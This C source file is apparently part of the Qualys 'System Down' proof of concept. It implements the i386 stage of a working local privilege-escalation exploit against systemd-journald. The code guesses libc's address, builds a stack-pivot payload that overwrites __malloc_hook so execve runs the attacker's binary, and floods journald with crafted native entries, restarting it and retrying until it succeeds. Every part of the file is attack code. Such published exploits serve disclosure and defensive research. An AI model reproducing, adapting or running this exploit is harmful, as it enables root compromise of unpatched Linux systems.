/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/param.h>
#include <sys/types.h>
#include <unistd.h>

#include "exploit.h"
#include "infoleak.h"
#include "journald.h"
#include "ldd.h"
#include "macro.h"
#include "reverse.h"
#include "target.h"

#define AVERAGE_TRIES (((size_t)1 << 20) / PAGE_SIZE)

static uintptr_t
potential_libc_address(void)
{
    static uintptr_t lowest = UINTPTR_MAX;
    static uintptr_t highest = 0;

    if (lowest <= highest) {
        if (lowest >= highest) die();
        if (lowest % PAGE_SIZE) die();
        if (highest % PAGE_SIZE) die();

        const uintptr_t libc_address = lowest;
        if (!is_mmap_address(libc_address)) die();
        lowest += PAGE_SIZE;

        printf("libc_address %08lx (highest %08lx)\n", (unsigned long)libc_address, (unsigned long)highest);
        return libc_address;
    }

    size_t i;
    for (i = 0; i < AVERAGE_TRIES; i++) {
        static char buf[65536];
        list_shared_libraries(target_bin_journald(), buf, sizeof(buf));

        const uintptr_t libc_address = shared_library_address(buf, "/libc.so.6 ");
        if (libc_address < lowest) lowest = libc_address;
        if (libc_address > highest) highest = libc_address;
    }

    if (lowest > highest) die();
    const uintptr_t libc_address = (lowest + (highest - lowest) / 2) & ~(uintptr_t)(PAGE_SIZE-1);
    if (!is_mmap_address(libc_address)) die();

    printf("libc_address %08lx (lowest %08lx highest %08lx)\n",
        (unsigned long)libc_address, (unsigned long)lowest, (unsigned long)highest);
    return libc_address;
}

static bool
exploit_i386_internal(const char * const self)
{
    if (target_arch() != TARGET_I386) die();
    if (!self) die();
    const tempfile_t tempfile = open_native_tempfile(false, DATA_SIZE_MAX);
    bool success = false;

    const uintptr_t libc_address = potential_libc_address();
    const uintptr_t stack_pivot_esp = target_stack_pivot_esp();
    if (libc_address <= stack_pivot_esp) die();
    if (libc_address - stack_pivot_esp >= DATA_SIZE_MAX) die();

    const uintptr_t write_what32 = libc_address + target_stack_pivot_offset();
    const uint64_t write_what = ((uint64_t)write_what32 << 32) | write_what32;
    printf("write_what %016llx\n", (unsigned long long)write_what);
    static char write_data[64];
    reverse_hash64(write_what, write_data, sizeof(write_data));
    printf("write_data %s\n", write_data);

    const uintptr_t malloc_hook = libc_address + target_malloc_hook_offset();
    const uintptr_t write_where = malloc_hook & ~(uintptr_t)(sizeof(write_what)-1);
    printf("write_where %08lx\n", (unsigned long)write_where);
    const uintptr_t items_alloca = write_where - offsetof(EntryItem, hash) - target_items_alloca_shift();
    printf("items_alloca %08lx\n", (unsigned long)items_alloca);
    if (items_alloca & 0xf) die();

    static char buf[1048576];
    size_t i;

  {
    if (sizeof(buf) % PAGE_SIZE) die();
    memset(buf, ' ', PAGE_SIZE);
    buf[0] = '#';
    xwrite(tempfile.fd, buf, PAGE_SIZE - mmap2mem());

    const size_t exec_off = stack_pivot_esp % PAGE_SIZE;
    const size_t file_off = exec_off + sizeof(uintptr_t) + target_stack_pivot_retn() % PAGE_SIZE;
    const size_t argv_off = file_off + sizeof(uintptr_t);
    const size_t envp_off = argv_off + sizeof(uintptr_t);
    const size_t self_off = envp_off + sizeof(uintptr_t);
    if (self_off + strlen(self) >= PAGE_SIZE) die();

    *(uintptr_t *)(buf + exec_off) = libc_address + target_call_execve_offset();
    *(uintptr_t *)(buf + file_off) = (stack_pivot_esp & ~(uintptr_t)(PAGE_SIZE-1)) + self_off;
    *(uintptr_t *)(buf + argv_off) = 0;
    *(uintptr_t *)(buf + envp_off) = 0;
    strcpy(buf + self_off, self);

    if (memchr(buf, '\n', PAGE_SIZE)) {
        puts("newline in payload");
        goto cleanup;
    }
    const size_t inbuf_n = sizeof(buf) / PAGE_SIZE;
    for (i = 1; i < inbuf_n; i++) {
        memcpy(buf + i * PAGE_SIZE, buf, PAGE_SIZE);
    }

    const uintptr_t stack_top_max = target_stack_top_max();
    if (stack_top_max <= items_alloca) die();
    const size_t max_iovec_total_fields = (stack_top_max - items_alloca) / sizeof(EntryItem);
    const size_t max_native_items_len = max_iovec_total_fields * NATIVE_ITEM_LEN;

    if (max_native_items_len >= DATA_SIZE_MAX - DEFAULT_MAX_SIZE_UPPER) die();
    size_t pages_n = (DATA_SIZE_MAX - DEFAULT_MAX_SIZE_UPPER - max_native_items_len) / PAGE_SIZE;
    while (pages_n) {
        const size_t write_n = MIN(pages_n, inbuf_n);
        xwrite(tempfile.fd, buf, write_n * PAGE_SIZE);
        pages_n -= write_n;
    }
    xwrite(tempfile.fd, "\n", 1);
  }

    const size_t shift_n = target_items_alloca_shift() / sizeof(EntryItem);
    for (i = 0; i < shift_n; i++) {
        xwrite(tempfile.fd, NATIVE_ITEM, NATIVE_ITEM_LEN);
    }

    xwrite(tempfile.fd, write_data, strlen(write_data));
    xwrite(tempfile.fd, "\n", 1);

  {
    xwrite(tempfile.fd, "A=", 2);
    memset(buf, 'a', sizeof(buf));
    size_t chars_n = DEFAULT_MAX_SIZE_UPPER;
    while (chars_n) {
        const size_t write_n = MIN(chars_n, sizeof(buf));
        xwrite(tempfile.fd, buf, write_n);
        chars_n -= write_n;
    }
    xwrite(tempfile.fd, "\n", 1);
  }

    const off_t tempfile_base_size = native_tempfile_size(tempfile);

    size_t try;
    for (try = 1; ; try++) {
        if (try > AVERAGE_TRIES * 16 * 2) die();
        printf("try %zu (probability 1/%zu)\n", try, AVERAGE_TRIES);

        address_t addresses[] = {
            { .offset = 0 },
            { .offset = infoleak_lowest_stack_offset() },
        };
        restart_journald();
        if (exploit_has_succeeded(self)) {
            success = true;
            break;
        }
        infoleak(addresses, ELEMENTSOF(addresses), 0, target_mmap_threshold_max());

        if (!is_transport_address(addresses[0].value)) continue;
        const uintptr_t leaked_stack_address = addresses[1].value;
        if (!is_stack_address(leaked_stack_address)) continue;

        const uintptr_t esp_before_alloca = leaked_stack_address - target_stack_pointer_distance();
        printf("esp_before_alloca %08lx\n", (unsigned long)esp_before_alloca);
        if (esp_before_alloca <= items_alloca) die();
        const size_t items_alloca_size = esp_before_alloca - items_alloca + (-esp_before_alloca & 0xf);
        printf("items_alloca_size %zu\n", items_alloca_size);
        if (items_alloca_size & 0xf) die();

      {
        if (esp_before_alloca <= items_alloca_size) die();
        const uintptr_t esp_after_alloca = esp_before_alloca - items_alloca_size;
        if (items_alloca != ((esp_after_alloca + 0xf) & ~(uintptr_t)0xf)) die();
      }

        if (items_alloca_size <= journald_LimitSTACKSoft()) die();
        const size_t items_alloca_request = items_alloca_size - 0x10;
        if (items_alloca_request % sizeof(EntryItem)) die();

        const size_t n_iovec_total_fields = items_alloca_request / sizeof(EntryItem);
        const size_t n_iovec_extra_fields = infoleak_n_iovec_extra_fields();
        if (n_iovec_total_fields <= n_iovec_extra_fields) die();

        size_t iovec_n = n_iovec_total_fields - n_iovec_extra_fields;
        if (iovec_n <= shift_n + 2) die();
        iovec_n -= shift_n + 2;

        if (lseek(tempfile.fd, tempfile_base_size, SEEK_SET) != tempfile_base_size) die();
        if (ftruncate(tempfile.fd, tempfile_base_size)) die();

        const size_t inbuf_n = sizeof(buf) / NATIVE_ITEM_LEN;
        for (i = 0; i < inbuf_n; i++) {
            memcpy(buf + i * NATIVE_ITEM_LEN, NATIVE_ITEM, NATIVE_ITEM_LEN);
        }
        while (iovec_n) {
            const size_t write_n = MIN(iovec_n, inbuf_n);
            xwrite(tempfile.fd, buf, write_n * NATIVE_ITEM_LEN);
            iovec_n -= write_n;
        }

        const int native_fd = open_native_connection();
        send_native_tempfile(native_fd, tempfile);
        if (close(native_fd)) die();
    }

cleanup:
    if (close(tempfile.fd)) die();
    return success;
}

void
exploit_i386(const char * const self)
{
    size_t i;
    for (i = 0; i < AVERAGE_TRIES; i++) {
        const bool success = exploit_i386_internal(self);
        if (success) exit(EXIT_SUCCESS);
    }
    die();
}

